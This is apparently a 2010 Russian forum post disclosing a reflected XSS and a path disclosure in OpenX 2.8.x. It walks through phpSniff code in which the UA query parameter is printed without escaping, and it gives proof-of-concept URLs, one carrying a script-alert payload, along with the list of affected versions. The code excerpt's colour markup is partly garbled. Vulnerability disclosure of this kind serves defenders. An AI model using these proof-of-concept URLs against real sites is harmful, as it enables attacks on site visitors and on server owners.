
20.10.2010, 14:08
pXSS (пассивная, т. е. отражённая XSS)
/plugins/deliveryLimitations/Client/lib/phpSniff/index.php
PHP код:
[COLOR="#000000"]/*...*/
require_once('phpSniff.class.php');
require_once('phpTimer.class.php');
/*...*/
// All three options are copied from $GET_VARS and handed to phpSniff unchanged.
// NOTE(review): $GET_VARS is filled in outside this excerpt; the ?UA= parameter in
// the PoC URL suggests it mirrors the query string. Confirm against the full file.
$sniffer_settings = array('check_cookies'=>$GET_VARS['cc'],
'default_language'=>$GET_VARS['dl'],
'allow_masquerading'=>$GET_VARS['am']);
// The UA value becomes the 'ua' browser property: the phpSniff constructor passes it
// to _set_browser('ua', $UA), which lower-cases it but does not HTML-encode it.
// Wherever this page prints get_property('ua'), the value has to be encoded for the
// output context first, e.g. htmlspecialchars($value, ENT_QUOTES).
$client =& new phpSniff($GET_VARS['UA'],$sniffer_settings);
/*...*/
[/COLOR]">ua
[/COLOR]">[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]get_property[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ua'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]?>[/COLOR]
/*...*/[/COLOR]
/plugins/deliveryLimitations/Client/lib/phpSniff/phpSniff.class.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]phpSniff[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$UA[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]/*..*/
[/COLOR][COLOR="#007700"]if(empty([/COLOR][COLOR="#0000BB"]$UA[/COLOR][COLOR="#007700"])) return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_set_browser[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ua'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$UA[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$run[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]init[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#FF8000"]/*...*/
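/**
 * Look up stored browser information.
 *
 * Values come back exactly as _set_browser() stored them: lower-cased, but
 * not encoded for any output context. A caller that prints a property into
 * HTML must escape it itself (e.g. htmlspecialchars($value, ENT_QUOTES)).
 *
 * @param string|null $p Property name, matched case-insensitively. When it
 *                       compares loosely equal to null, the whole array is returned.
 * @return mixed The full _browser_info array, the stored value, or null
 *               when the requested property was never set.
 */
function property($p = null)
{
    // Loose comparison kept so that '' and 0 still select the whole array.
    if ($p == null) {
        return $this->_browser_info;
    }

    $key = strtolower($p);

    // An unknown property yields null explicitly instead of reading an
    // undefined index (same return value, no notice or warning).
    return isset($this->_browser_info[$key]) ? $this->_browser_info[$key] : null;
}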
[/COLOR][COLOR="#FF8000"]/*...*/
/**
 * Record one browser property.
 *
 * Both the key and the value are lower-cased before being stored. No other
 * filtering or encoding is applied, so a value that originated from the
 * request is kept as markup-capable text and must be escaped at output time.
 *
 * @param string $k Property name.
 * @param string $v Property value.
 */
function _set_browser($k, $v)
{
    $key = strtolower($k);
    $value = strtolower($v);

    $this->_browser_info[$key] = $value;
}
[/COLOR][COLOR="#FF8000"]/*...*/
/**
 * Public accessor for a single browser property; delegates to property().
 *
 * The result is passed through untouched, so it is not safe to print into
 * HTML without escaping.
 *
 * @param string $p Property name.
 * @return mixed Whatever property() returns for $p.
 */
function get_property($p)
{
    $value = $this->property($p);

    return $value;
}
[/COLOR][COLOR="#FF8000"]/*...*/[/COLOR][/COLOR]
Код:
PoC
http://[host]/[path]/plugins/deliveryLimitations/Client/lib/phpSniff/index.php?UA=%3Cscript%3Ealert%28123%29%3C/script%3E
Проверил на OpenX 2.8.1, 2.8.2, 2.8.3, 2.8.4, 2.8.6, 2.8.7.
Path disclosure
Условия: никаких.
На данный момент всё, что нашёл, работает и в последней ветке 2.8.7.
Код:
PoC http://[host]/[path]/www/admin/plugins/openXWorkflow/application/bootstrap.php